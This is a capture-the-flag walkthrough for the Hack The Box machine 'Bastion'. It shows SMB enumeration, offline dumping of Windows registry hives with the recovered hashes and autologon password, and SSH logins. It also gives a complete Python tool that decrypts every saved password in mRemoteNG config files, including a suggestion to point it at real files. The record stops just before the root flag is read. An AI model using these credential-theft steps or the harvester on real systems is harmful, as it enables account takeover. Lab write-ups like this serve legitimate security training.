bastion

Introduction:
Recon
eneloop@kinetic:.../hackthebox/bastion/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.bastion.txt 10.10.10.134
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 20:57 EDT
Nmap scan report for 10.10.10.134
Host is up (0.086s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -36m10s, deviation: 1h09m14s, median: 3m47s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-16T03:01:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-16T01:01:21
|_ start_date: 2021-04-16T00:58:25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds
Enumerate SMB
The scan already shows that the SMB scripts authenticated as guest (account_used: guest), so the first thing to try is a guest share listing and a null session with smbclient.
eneloop@kinetic:.../hackthebox/bastion/data$ smbmap -u guest -H 10.10.10.134
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
[!] Unable to remove test directory at \\10.10.10.134\Backups\OGRXPGEWYQ, please remove manually
 Disk Permissions Comment
 ---- ----------- -------
 ADMIN$ NO ACCESS Remote Admin
 Backups READ, WRITE
 C$ NO ACCESS Default share
 IPC$ READ ONLY Remote IPC
eneloop@kinetic:.../hackthebox/bastion/data$ smbclient //10.10.10.134/Backups
Enter WORKGROUP\eneloop's password:
Try "help" to get a list of possible commands.
smb: \> dir
 . D 0 Thu Apr 15 21:06:00 2021
 .. D 0 Thu Apr 15 21:06:00 2021
 note.txt AR 116 Tue Apr 16 06:10:09 2019
 OGRXPGEWYQ D 0 Thu Apr 15 21:06:00 2021
 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
 WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019

 7735807 blocks of size 4096. 2747370 blocks available
smb: \> mget *
Get file note.txt? y
getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
Get file SDT65CB.tmp? y
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Enumeration
The Backups share is readable and writable as guest (the OGRXPGEWYQ directory is smbmap's write test, which it could not clean up) and holds a Windows Image Backup of a machine called L4mpje-PC, presumably the workstation of a user named L4mpje. Windows Image Backup stores each backed-up volume as a VHD file, so the interesting content is under the dated Backup folder; note that smbclient needs that folder name quoted because it contains spaces, as the failed cd below shows.
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> ls
 . Dn 0 Fri Feb 22 07:44:02 2019
 .. Dn 0 Fri Feb 22 07:44:02 2019
 L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019

 7735807 blocks of size 4096. 2738317 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC
smb: \WindowsImageBackup\L4mpje-PC\> ls
 . Dn 0 Fri Feb 22 07:45:32 2019
 .. Dn 0 Fri Feb 22 07:45:32 2019
 Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
 Catalog Dn 0 Fri Feb 22 07:45:32 2019
 MediaId An 16 Fri Feb 22 07:44:02 2019
 SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019

 7735807 blocks of size 4096. 2738180 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351
cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \WindowsImageBackup\L4mpje-PC\> pwd
Current directory is \\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
 . Dn 0 Fri Feb 22 07:45:32 2019
 .. Dn 0 Fri Feb 22 07:45:32 2019
 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
 BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019

 7735807 blocks of size 4096. 2763199 blocks available
Rather than pull the 5.4 GB VHD across the VPN, mount the share locally with mount.cifs (from the cifs-utils package) and then mount the VHD through that path with guestmount (from libguestfs-tools), which reads the image in place. Both tools need to be installed first. Of the two VHDs, the 5.4 GB one (9b9cfbc4-...) holds the Windows volume; the 36 MB one is the small boot/system-reserved volume. The share is mounted read-write below, but -o ro is enough, since nothing has to be written back to it.
eneloop@kinetic:.../hackthebox/bastion/data$ sudo apt-get install cifs-utils
[sudo] password for eneloop:
Reading package lists... Done
Building dependency tree
Reading state information... Done
cifs-utils is already the newest version (2:6.11-1).
The following package was automatically installed and is no longer required:
 libboost-thread1.74.0
Use 'sudo apt autoremove' to remove it.
0 upgraded, 0 newly installed, 0 to remove and 955 not upgraded.
eneloop@kinetic:.../hackthebox/bastion/data$

eneloop@kinetic:.../hackthebox/bastion/data$ sudo mount -t cifs //10.10.10.134/Backups/ /oscp/LABs/zerotrust/content/lab/hackthebox/bastion/data/L4mpje-PC -o rw
🔐 Password for root@//10.10.10.134/Backups/: **********
eneloop@kinetic:.../hackthebox/bastion/data$ cd L4mpje-PC/
eneloop@kinetic:.../bastion/data/L4mpje-PC$ ls
note.txt OGRXPGEWYQ SDT65CB.tmp WindowsImageBackup

eneloop@kinetic:~$ cd Downloads
eneloop@kinetic:~/Downloads$ mkdir L4mpje-PC-vhd
eneloop@kinetic:~/Downloads$ pwd
/home/eneloop/Downloads
eneloop@kinetic:~/Downloads$ guestmount --add /oscp/LABs/zerotrust/content/lab/hackthebox/bastion/data/L4mpje-PC/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/eneloop/Downloads/L4mpje-PC-vhd
eneloop@kinetic:~/Downloads$ cd L4mpje-PC-vhd
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ ls
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$
Exploitation
Interesting files on the Windows image
With a full disk image of a Windows machine mounted, the next step is to pull out the files that commonly hold credentials or configuration secrets. The Windows path-traversal cheat sheets below were written for LFI, but they double as a checklist of paths worth reading from an offline image; the registry hives under Windows\System32\config are the first stop.
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt [very comprehensive list]
https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt [the same file, rendered on GitHub]
eneloop@kinetic:.../hackthebox/bastion/data$ cd /home/eneloop/Downloads/L4mpje-PC-vhd
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ ls
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ cd Windows/
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd/Windows$ ls
 addins Branding 'Downloaded Program Files' Globalization LiveKernelReports notepad.exe Prefetch security SoftwareDistribution Tasks twunk_16.exe winhlp32.exe
 AppCompat CSC DtcInstall.log Help Logs 'Offline Web Pages' Professional.xml ServiceProfiles Speech Temp twunk_32.exe win.ini
 AppPatch Cursors ehome HelpPane.exe Media Panther regedit.exe servicing Starter.xml tracing Vss winsxs
 assembly debug en-US hh.exe mib.bin Performance Registration Setup system TSSysprep.log Web WMSysPr9.prx
 bfsvc.exe _default.pif explorer.exe IME Microsoft.NET PFRO.log Resources setupact.log System32 twain_32 WindowsShell.Manifest write.exe
 Boot diagnostics Fonts inf ModemLogs PLA SchCache setuperr.log system.ini twain_32.dll WindowsUpdate.log
 bootstat.dat DigitalLocker fveupdate.exe L2Schemas msdfmap.ini PolicyDefinitions schemas ShellNew TAPI twain.dll winhelp.exe
eneloop@kinetic:~/Downloads/L4mpje-PC-vhd/Windows$ cd System32

Dump credentials from the SAM, SECURITY and SYSTEM hives
The SAM hive is encrypted with the boot key that lives in SYSTEM, and the LSA secrets (cached credentials, autologon password, DPAPI keys) live in SECURITY, so secretsdump needs all three files. With LOCAL it parses the hives offline instead of talking to a host.
eneloop@kinetic:~/.../Windows/System32/config$ pwd
/home/eneloop/Downloads/L4mpje-PC-vhd/Windows/System32/config
eneloop@kinetic:~/.../Windows/System32/config$ ls -l SAM
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM
eneloop@kinetic:~/.../Windows/System32/config$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
eneloop@kinetic:~/.../Windows/System32/config$
The dump gives us three useful things. The DefaultPassword LSA secret, bureaulampje, is the autologon password stored in the SECURITY hive, and since L4mpje is the only real user on the backed-up machine it is the obvious candidate for that account. The Administrator and Guest NT hashes are 31d6cfe0d16ae931b73c59d7e0c089c0, which is the NT hash of an empty password, so those accounts had no password set in this backup (typically because they were disabled); only L4mpje's hash 26112010952d963c8dc4217daec986d9 is worth feeding to john (--format=NT), hashcat (-m 1000) or an online lookup. All three LM hashes are the empty LM hash, so there is no weak LM material to attack.


SSH into the remote system
As the scan showed, port 22 is open (OpenSSH for Windows), so we can try to SSH into the machine as L4mpje with the DefaultPassword value recovered above.
eneloop@kinetic:.../hackthebox/bastion/data$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password:

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Post-exploit/PrivEsc
User flag
l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\Desktop

22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
 1 File(s) 32 bytes
 2 Dir(s) 11.296.014.336 bytes free

l4mpje@BASTION C:\Users\L4mpje\Desktop>
Root flag
I copied winPEAS.bat over with scp and ran it, but it took very long and I ran out of patience.
eneloop@kinetic:.../PEAS/winPEAS/winPEASbat$ scp winPEAS.bat L4mpje@10.10.10.134:'C:\Users\L4mpje\Documents\winPEAS.bat'
L4mpje@10.10.10.134's password:
winPEAS.bat
l4mpje@BASTION C:\Users\L4mpje\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\Documents

18-04-2021 16:59 <DIR> .
18-04-2021 16:59 <DIR> ..
18-04-2021 16:59 35.107 winPEAS.bat
 1 File(s) 35.107 bytes
 2 Dir(s) 11.295.694.848 bytes free

l4mpje@BASTION C:\Users\L4mpje\Documents>winPEAS.bat
While looking at installed programs under Program Files, I noticed mRemoteNG. It is a remote connection manager (RDP, SSH, VNC and others) that stores connection profiles, including saved passwords, in confCons.xml under the user's AppData\Roaming\mRemoteNG folder, so those files are worth reading.
l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>cd C:\Users\%USER%\AppData\Roaming\mRemoteNG\

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
22-02-2019 15:03 5.217 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
 14 File(s) 76.577 bytes
 3 Dir(s) 11.286.224.896 bytes free

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>
Inside confCons.xml every saved connection is a Node element. The one named DC is an RDP connection to 127.0.0.1 as Administrator, and its Password attribute holds the encrypted password:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>pwd
'pwd' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j22XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" Disp

15
The Password value is AES-GCM ciphertext (the header says EncryptionEngine="AES", BlockCipherMode="GCM", KdfIterations="1000"), but the key is derived from a master password that defaults to "mR3m" when the user never sets one, so the config file alone is enough to recover the plaintext. Several decryption scripts exist; the one below from GitHub is short enough to read before running:
https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Run it with the Password value from the config file:
eneloop@kinetic:.../hackthebox/bastion/data$ python3 ./mremoteng_decrypt.py -s aEWNFVXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXWWA10dQKiw==
Password: thXLXXXXXXXL0ER2
eneloop@kinetic:.../hackthebox/bastion/data$

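For reference, the same decryption written out in full, as an added example that is my own code rather than the linked script or mRemoteNG's source. It assumes the format the header above advertises: the Password attribute is base64 of a 16-byte salt, a 16-byte GCM nonce, the ciphertext and a 16-byte GCM tag; the AES-256 key is PBKDF2-HMAC-SHA1 over the master password (default "mR3m") with that salt and the KdfIterations count, and the salt doubles as the GCM associated data. The sample XML is a trimmed copy of the Node shown above; the encrypt helper exists only to round-trip a constructed secret, and the cryptography package supplies AES-GCM.

```python
"""Decrypt saved passwords from an mRemoteNG confCons.xml (ConfVersion 2.6).

Added example; not mRemoteNG's own code and not the linked script.
Assumed layout (matches the header attributes shown above):
    Password = base64( salt[16] || nonce[16] || ciphertext || tag[16] )
    key      = PBKDF2-HMAC-SHA1(master, salt, KdfIterations, 32 bytes)
    AAD      = salt
    master   = "mR3m" unless the user set one
Requires the 'cryptography' package (pip install cryptography).
"""
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

DEFAULT_MASTER = "mR3m"          # mRemoteNG's built-in default master password
SALT_LEN = NONCE_LEN = TAG_LEN = 16

# The Password value from the DC node above (page data, not constructed).
SAMPLE_BLOB = "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

# Trimmed copy of the confCons.xml shown above; attributes not needed here are dropped.
SAMPLE_CONFCONS = f"""<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Password="{SAMPLE_BLOB}" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
</mrng:Connections>
"""


def split_blob(b64: str):
    """Return (salt, nonce, ciphertext, tag) from a base64 Password value."""
    raw = base64.b64decode(b64)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short to hold salt, nonce and tag")
    return (raw[:SALT_LEN], raw[SALT_LEN:SALT_LEN + NONCE_LEN],
            raw[SALT_LEN + NONCE_LEN:-TAG_LEN], raw[-TAG_LEN:])


def derive_key(master: str, salt: bytes, iterations: int = 1000) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", master.encode("utf-8"), salt, iterations, dklen=32)


def decrypt_password(b64: str, master: str = DEFAULT_MASTER, iterations: int = 1000) -> str:
    salt, nonce, ct, tag = split_blob(b64)
    key = derive_key(master, salt, iterations)
    # cryptography wants ciphertext||tag; a wrong master password raises InvalidTag.
    return AESGCM(key).decrypt(nonce, ct + tag, salt).decode("utf-8")


def try_decrypt(b64: str, master: str, iterations: int = 1000):
    """Return the plaintext, or None when the GCM tag check fails (wrong master)."""
    try:
        return decrypt_password(b64, master, iterations)
    except InvalidTag:
        return None


def encrypt_password(plaintext: str, master: str = DEFAULT_MASTER, iterations: int = 1000) -> str:
    """Inverse of decrypt_password, used here only to round-trip a constructed secret."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    key = derive_key(master, salt, iterations)
    ct_tag = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + ct_tag).decode("ascii")


def harvest(conf_xml: str, master: str = DEFAULT_MASTER) -> list:
    """Decrypt every Connection node's Password using the file's own KdfIterations."""
    root = ET.fromstring(conf_xml)
    iterations = int(root.get("KdfIterations", "1000"))
    creds = []
    for node in root.iter():
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        creds.append({
            "name": node.get("Name"),
            "host": node.get("Hostname"),
            "protocol": node.get("Protocol"),
            "username": node.get("Username"),
            "password": decrypt_password(node.get("Password"), master, iterations),
        })
    return creds


if __name__ == "__main__":
    for c in harvest(SAMPLE_CONFCONS):
        print(f"{c['name']}: {c['protocol']} {c['username']}@{c['host']} password={c['password']}")
```

Point harvest() at a real confCons.xml (and its .backup copies, which may hold older passwords) to pull every saved credential at once. If every node fails with InvalidTag, the user set a master password; at 1000 PBKDF2 iterations guessing it is cheap.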
That entry was the Administrator account on this very machine (Hostname 127.0.0.1), and the recovered password also works over SSH, so we can log in as Administrator and read the root flag:
eneloop@kinetic:.../hackthebox/bastion/data$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password:

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>cd Desktop

administrator@BASTION C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487

 Directory of C:\Users\Administrator\Desktop

23-02-2019 10:40 <DIR> .
23-02-2019 10:40 <DIR> ..
23-02-2019 10:07 32 root.txt
 1 File(s) 32 bytes
 2 Dir(s) 11.285.741.568 bytes free

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
Notes: